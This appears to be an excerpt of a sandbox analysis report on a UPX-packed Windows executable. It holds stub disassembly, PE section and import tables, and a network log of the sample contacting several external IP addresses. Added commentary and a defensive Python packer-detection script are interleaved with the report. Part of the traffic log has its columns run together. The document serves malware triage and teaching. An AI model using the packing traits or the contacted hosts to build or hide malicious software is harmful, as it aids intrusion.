                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                jc 00007F6A78FB4EAFh
                                                                                                                                mov eax, 00000001h
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                adc eax, eax
                                                                                                                                add ebx, ebx
                                                                                                                                jnc 00007F6A78FB4ECDh
                                                                                                                                jne 00007F6A78FB4EEAh
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                jc 00007F6A78FB4EE1h
                                                                                                                                dec eax
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                adc eax, eax
                                                                                                                                jmp 00007F6A78FB4E96h
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                adc ecx, ecx
                                                                                                                                jmp 00007F6A78FB4F14h
                                                                                                                                xor ecx, ecx
    sub eax, 03h
    jc 00007F6A78FB4ED3h
    shl eax, 08h
    mov al, byte ptr [esi]
    inc esi
    xor eax, FFFFFFFFh
    je 00007F6A78FB4F37h
    sar eax, 1
    mov ebp, eax
    jmp 00007F6A78FB4ECDh
    add ebx, ebx
    jne 00007F6A78FB4EC9h
    mov ebx, dword ptr [esi]
    sub esi, FFFFFFFCh
    adc ebx, ebx
    jc 00007F6A78FB4E8Eh
    inc ecx
    add ebx, ebx
    jne 00007F6A78FB4EC9h
    mov ebx, dword ptr [esi]
    sub esi, FFFFFFFCh
    adc ebx, ebx
    jc 00007F6A78FB4E80h
    add ebx, ebx
    jne 00007F6A78FB4EC9h
    mov ebx, dword ptr [esi]
    sub esi, FFFFFFFCh
    adc ebx, ebx
    adc ecx, ecx
    add ebx, ebx
    jnc 00007F6A78FB4EB1h
    jne 00007F6A78FB4ECBh
    mov ebx, dword ptr [esi]
    sub esi, FFFFFFFCh
    adc ebx, ebx
    jnc 00007F6A78FB4EA6h
    add ecx, 02h
    cmp ebp, FFFFFB00h
    adc ecx, 02h
    lea edx, dword ptr [edi+ebp]
    cmp ebp, FFFFFFFCh
    jbe 00007F6A78FB4ED0h
    mov al, byte ptr [edx]
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD5 build 40629
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD5 build 40629
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1818fc         0x424         .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x12d000         0x548fc       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x181d20         0xc           .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x12cbe4         0x48          UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name   Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
UPX0   0x1000           0xd6000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1   0xd7000          0x56000       0x55e00   a28411f0795d6b9c1fc67929c419323c  False     0.9873061089883551  data       7.935738348120997  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  0x12d000         0x55000       0x54e00   fcf71183dcf60ec29f044b27f0ce792a  False     0.9655657446612665  data       7.969680204762934  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
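The section table above carries the four classic UPX tells at once: UPX-named sections, an executable UPX0 with virtual size 0xd6000 but zero raw size (the stub decompresses into it at run time), every section writable and executable, and entropy of 7.94 / 7.97 in the sections that do have data. The script below is an added example, not code from the Joe Sandbox report or from the UPX project: it parses the PE section headers with the standard library only and applies those same indicators. The 7.0-bit entropy threshold and the "two or more indicators per section" rule are this example's own choices, and build_pe() constructs a minimal PE32 in memory so the code runs offline; the section bytes it fills in are constructed, not taken from the sample.

```python
"""Packer heuristics from the PE section table (stdlib only).

Added example; not code from the sandbox report or from UPX. The thresholds
are assumptions, and build_pe() fabricates a minimal PE so this runs offline.
"""
import math
import random
import struct
from collections import Counter

# IMAGE_SECTION_HEADER.Characteristics flags (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes
ENTROPY_THRESHOLD = 7.0  # bits/byte (assumed cut-off); compressed data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for an empty section."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """DOS header -> NT headers -> section table; returns one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: NumberOfSections at +6, SizeOfOptionalHeader at +20 from the signature
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(num_sections):
        name, vsize, va, rsize, rptr, _, _, _, _, chars = SECTION_HDR.unpack_from(pe, table + 40 * i)
        raw = pe[rptr:rptr + rsize] if rsize else b""  # raw size 0 => nothing on disk
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": va, "virtual_size": vsize, "raw_size": rsize,
                         "characteristics": chars, "entropy": shannon_entropy(raw)})
    return sections


def packer_indicators(sections: list) -> dict:
    """Section name -> list of indicator strings (empty list = nothing suspicious)."""
    findings = {}
    for s in sections:
        c, hits = s["characteristics"], []
        if s["name"].upper().startswith("UPX"):
            hits.append("upx-section-name")
        if s["raw_size"] == 0 and s["virtual_size"] > 0 and c & IMAGE_SCN_MEM_EXECUTE:
            hits.append("executable-with-no-raw-data")  # unpack destination filled at run time
        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
            hits.append("writable-and-executable")
        if s["entropy"] > ENTROPY_THRESHOLD:
            hits.append("high-entropy")
        findings[s["name"]] = hits
    return findings


def is_likely_packed(pe: bytes) -> bool:
    """True when any section carries two or more independent indicators (assumed rule)."""
    return any(len(h) >= 2 for h in packer_indicators(parse_sections(pe)).values())


def build_pe(sections: list) -> bytes:
    """Constructed minimal PE32 (DOS header, NT headers, section table, raw data).
    sections: list of (name, virtual_size, raw_bytes, characteristics)."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    rptr = e_lfanew + 24 + opt_size + 40 * len(sections)  # raw data follows the headers
    table, raw, va = b"", b"", 0x1000
    for name, vsize, data, chars in sections:
        table += SECTION_HDR.pack(name.encode().ljust(8, b"\0"), vsize, va, len(data),
                                  rptr if data else 0, 0, 0, 0, 0, chars)
        raw, rptr = raw + data, rptr + len(data)
        va += (max(vsize, 1) + 0xFFF) & ~0xFFF  # next section on a page boundary
    return dos + b"PE\0\0" + file_hdr + opt_hdr + table + raw


def sample_packed() -> bytes:
    """Constructed image with the report's UPX0 / UPX1 / .rsrc layout (bytes are synthetic)."""
    rng = random.Random(1)
    payload = bytes(rng.getrandbits(8) for _ in range(4096))  # stands in for the compressed program
    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    return build_pe([
        ("UPX0", 0xD6000, b"", IMAGE_SCN_CNT_UNINITIALIZED_DATA | rwx),
        ("UPX1", 0x1000, payload, IMAGE_SCN_CNT_INITIALIZED_DATA | rwx),
        (".rsrc", 0x400, b"\0" * 0x400, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    ])


def sample_benign() -> bytes:
    """Constructed unpacked image: low-entropy code, no W+X, no empty executable section."""
    code = b"\x55\x8b\xec\x83\xec\x10\x33\xc0\xc9\xc3" * 200  # repetitive prologue/epilogue bytes
    return build_pe([
        (".text", len(code), code, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (".data", 0x200, b"A" * 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ])


if __name__ == "__main__":
    for label, image in (("packed", sample_packed()), ("benign", sample_benign())):
        print(label, "likely packed:", is_likely_packed(image), packer_indicators(parse_sections(image)))
```

Against a real file the call is `is_likely_packed(open(path, "rb").read())`. Treat the output as a triage signal, the way the report does, not as a verdict: section names are trivially renamed, a high-entropy section can be a legitimate compressed resource, and a custom packer need not leave an empty executable section. Note also that `parse_sections` trusts the header fields; on a malformed sample, PointerToRawData can point past the end of the file, which slicing tolerates, but a production parser should also bound-check NumberOfSections and e_lfanew.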
Name           RVA       Size     Type                                                              Language  Country        ZLIB Complexity
RT_ICON        0x12d3b4  0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192    English   Great Britain  0.3885135135135135
RT_ICON        0x12d4e0  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1024  English   Great Britain  0.4875886524822695
RT_ICON        0x12d94c  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4096  English   Great Britain  0.34310506566604126
RT_ICON        0x12e9f8  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9216  English   Great Britain  0.2629668049792531
RT_STRING      0xcaf90   0x594    empty                                                             English   Great Britain  0
RT_STRING      0xcb524   0x68a    empty                                                             English   Great Britain  0
RT_STRING      0xcbbb0   0x490    empty                                                             English   Great Britain  0
RT_STRING      0xcc040   0x5fc    empty                                                             English   Great Britain  0
RT_STRING      0xcc63c   0x65c    empty                                                             English   Great Britain  0
RT_STRING      0xccc98   0x466    empty                                                             English   Great Britain  0
RT_STRING      0xcd100   0x158    empty                                                             English   Great Britain  0
RT_RCDATA      0x130fa4  0x50435  data                                                                                       1.0003376353963567
RT_GROUP_ICON  0x1813e0  0x30     data                                                              English   Great Britain  0.9166666666666666
RT_GROUP_ICON  0x181414  0x14     data                                                              English   Great Britain  1.15
RT_VERSION     0x18142c  0xdc     data                                                              English   Great Britain  0.6181818181818182
RT_MANIFEST    0x18150c  0x3ef    ASCII text, with CRLF line terminators                            English   Great Britain  0.5074478649453823

Note: the RT_STRING entries have RVAs between 0xcaf90 and 0xcd100, inside UPX0 (0x1000 to 0xd7000), the section with zero raw size. Those string tables exist only after the stub has decompressed the original program into UPX0, which is why the static scan reads them as empty; dump them from memory or from an unpacked copy. The RT_RCDATA blob (0x50435 bytes, ZLIB complexity 1.0) is the only large resource and is not further compressible.
DLL           Import
KERNEL32.DLL  LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll  GetAce
COMCTL32.dll  ImageList_Remove
COMDLG32.dll  GetOpenFileNameW
GDI32.dll     LineTo
IPHLPAPI.DLL  IcmpSendEcho
MPR.dll       WNetUseConnectionW
ole32.dll     CoGetObject
OLEAUT32.dll  VariantInit
PSAPI.DLL     GetProcessMemoryInfo
SHELL32.dll   DragFinish
USER32.dll    GetDC
USERENV.dll   LoadUserProfileW
UxTheme.dll   IsThemeActive
VERSION.dll   VerQueryValueW
WININET.dll   FtpOpenFileW
WINMM.dll     timeGetTime
WSOCK32.dll   connect

Note: this is the UPX stub's import table, not the original program's. The KERNEL32 entries are what the stub needs to decompress and relocate (VirtualAlloc/VirtualProtect) and to resolve the real imports by name (LoadLibraryA/GetProcAddress); the single function kept per other DLL only forces the loader to map that library. The IAT data directory is 0x0 and the import directory sits in .rsrc for the same reason. The genuine import list is only recoverable after unpacking (or from a memory dump taken after the stub has run).
Language of compilation system  Country where language is spoken
English                         Great Britain
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Oct 29, 2024 16:54:07.736346006 CET  49707        80         192.168.2.8     194.58.112.174
Oct 29, 2024 16:54:07.741885900 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:07.741976023 CET  49707        80         192.168.2.8     194.58.112.174
Oct 29, 2024 16:54:07.750056028 CET  49707        80         192.168.2.8     194.58.112.174
Oct 29, 2024 16:54:07.755552053 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641187906 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641231060 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641246080 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641261101 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641284943 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641299009 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641314983 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641329050 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641345978 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.641514063 CET  49707        80         192.168.2.8     194.58.112.174
Oct 29, 2024 16:54:08.641514063 CET  49707        80         192.168.2.8     194.58.112.174
Oct 29, 2024 16:54:08.793138027 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:08.793342113 CET  49707        80         192.168.2.8     194.58.112.174
Oct 29, 2024 16:54:08.794737101 CET  49707        80         192.168.2.8     194.58.112.174
Oct 29, 2024 16:54:08.800318003 CET  80           49707      194.58.112.174  192.168.2.8
Oct 29, 2024 16:54:23.969654083 CET  49709        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:23.975110054 CET  80           49709      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:23.975203037 CET  49709        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:23.986207008 CET  49709        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:23.992036104 CET  80           49709      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:24.627417088 CET  80           49709      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:24.627605915 CET  80           49709      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:24.627780914 CET  49709        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:25.090483904 CET  80           49709      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:25.090588093 CET  49709        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:25.492165089 CET  49709        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:26.510874987 CET  49710        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:26.516602993 CET  80           49710      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:26.516690016 CET  49710        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:26.527187109 CET  49710        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:26.532778978 CET  80           49710      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:27.136584997 CET  80           49710      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:27.136610031 CET  80           49710      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:27.136704922 CET  49710        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:27.587565899 CET  80           49710      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:27.587774992 CET  49710        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:28.038944006 CET  49710        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:29.057809114 CET  49711        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:29.063905001 CET  80           49711      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:29.063985109 CET  49711        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:29.080543041 CET  49711        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:29.088602066 CET  80           49711      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:29.088618040 CET  80           49711      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:29.775293112 CET  80           49711      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:29.775329113 CET  80           49711      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:29.775418043 CET  49711        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:30.244187117 CET  80           49711      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:30.244256973 CET  49711        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:30.585798025 CET  49711        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:31.671700954 CET  49712        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:31.677175045 CET  80           49712      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:31.677252054 CET  49712        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:31.684633017 CET  49712        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:31.690013885 CET  80           49712      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:32.301740885 CET  80           49712      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:32.302568913 CET  80           49712      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:32.302717924 CET  49712        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:32.755834103 CET  80           49712      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:32.755969048 CET  49712        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:32.756829977 CET  49712        80         192.168.2.8     199.59.243.227
Oct 29, 2024 16:54:32.762331009 CET  80           49712      199.59.243.227  192.168.2.8
Oct 29, 2024 16:54:37.871479988 CET  49713        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:37.877052069 CET  80           49713      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:37.877149105 CET  49713        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:37.888039112 CET  49713        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:37.893826962 CET  80           49713      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:38.585422993 CET  80           49713      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:38.585983038 CET  49713        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:39.398464918 CET  49713        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:39.403918982 CET  80           49713      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:40.455709934 CET  49714        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:40.461184978 CET  80           49714      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:40.461313963 CET  49714        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:40.472532988 CET  49714        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:40.478367090 CET  80           49714      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:41.156519890 CET  80           49714      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:41.156577110 CET  49714        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:41.976793051 CET  49714        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:41.982681036 CET  80           49714      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:43.040766954 CET  49715        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:43.046225071 CET  80           49715      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:43.046319962 CET  49715        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:43.068149090 CET  49715        80         192.168.2.8     3.33.130.190
Oct 29, 2024 16:54:43.073755026 CET  80           49715      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:43.073813915 CET  80           49715      3.33.130.190    192.168.2.8
Oct 29, 2024 16:54:43.684602022 CET  80           49715      3.33.130.190    192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:43.684772015 CET4971580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:44.570229053 CET4971580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:44.576132059 CET80497153.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:45.674669027 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:45.680464029 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:45.680536985 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:45.692089081 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:45.697987080 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:46.330796957 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:46.382544041 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:46.676260948 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:46.676393032 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:46.677282095 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:46.683768034 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:51.701333046 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:51.706784964 CET8049717103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:51.706845999 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:51.717940092 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:51.723324060 CET8049717103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:52.674695015 CET8049717103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:52.726331949 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:52.856127024 CET8049717103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:52.856194973 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:53.226515055 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:54.251993895 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:54.648396015 CET8049718103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:54.648483992 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:54.660399914 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:54.665805101 CET8049718103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:55.661431074 CET8049718103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:55.710676908 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:55.809921980 CET8049718103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:55.810192108 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:56.164043903 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:57.182941914 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:57.188472033 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:57.188580990 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:57.199455023 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:57.205219984 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:57.205493927 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:58.142385006 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:58.195056915 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:58.318581104 CET8049719103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:58.318834066 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:58.710755110 CET4971980192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:59.729924917 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:59.736437082 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:59.736588955 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:59.743482113 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:59.749234915 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:00.676203012 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:00.730026007 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:55:01.104195118 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:01.104343891 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:55:01.104665995 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:01.104705095 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:55:01.105470896 CET4972080192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:55:01.110799074 CET8049720103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:06.143233061 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:06.150424957 CET804972181.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:06.150536060 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:06.161556959 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:06.166946888 CET804972181.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:06.999253988 CET804972181.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:07.054445028 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:07.340338945 CET804972181.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:07.340506077 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:07.664009094 CET4972180192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:08.685894012 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:08.691378117 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:08.691519976 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:08.701910973 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:08.707333088 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:09.931350946 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:09.931967974 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:09.932012081 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:09.932327986 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:09.932375908 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:10.210751057 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:10.984937906 CET804972281.169.145.95192.168.2.8
